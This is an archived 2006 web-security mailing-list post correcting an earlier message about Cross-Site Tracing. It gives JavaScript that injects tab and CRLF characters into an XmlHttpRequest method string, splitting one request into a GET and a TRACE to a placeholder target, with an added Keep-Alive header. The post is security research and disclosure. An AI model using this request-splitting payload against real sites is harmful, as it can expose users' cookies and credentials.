[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[WEB SECURITY] ERRATA: Re: [WEB SECURITY] XST

From: "Amit Klein (AKsecurity)" <aksecurity@xxxxxxxxxx>
Subject: [WEB SECURITY] ERRATA: Re: [WEB SECURITY] XST
Date: Tue, 21 Mar 2006 16:25:20 +0200

> 
> Well, you can try the technique I dubbed "HTTP Request splitting", see
> "Exploiting the XmlHttpRequest object in IE - Referrer spoofing, and a lot more..." by 
> yours truly, 
> http://www.webappsec.org/lists/websecurity/archive/2005-09/msg00019.html
> 
> Try something like this:
> 
>   var x = new ActiveXObject("Microsoft.XMLHTTP");
> 
>   x.open("GET\t/\tHTTP/1.0\r\nHost:\twww.target.site\r\n\r\nTRACE\t/\tHTTP/1.0\r\nFoobar:",
> 	"/",false);
> 

I should've taken care of the connection persistence...

Please use (note the addition of the "Connection: Keep-Alive" header):

   x.open("GET\t/\tHTTP/1.0\r\nHost:\twww.target.site\r\nConnection:\t
	Keep-	Alive\r\n\r\nTRACE\t/\tHTTP/1.0\r\nFoobar:","/",false);


>   x.send();
> 

 [...]

-Amit

---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/

Prev by Date: RE: [WEB SECURITY] How to Create Secure Web Applications with Struts
Next by Date: Re: [WEB SECURITY] How to Create Secure Web Applications with Struts
Previous by thread: [WEB SECURITY] Interesting University Security Weakness
Next by thread: RE: [WEB SECURITY] How to Create Secure Web Applications with Struts
Index(es):
- Date
- Thread

Brought to you by http://www.webappsec.org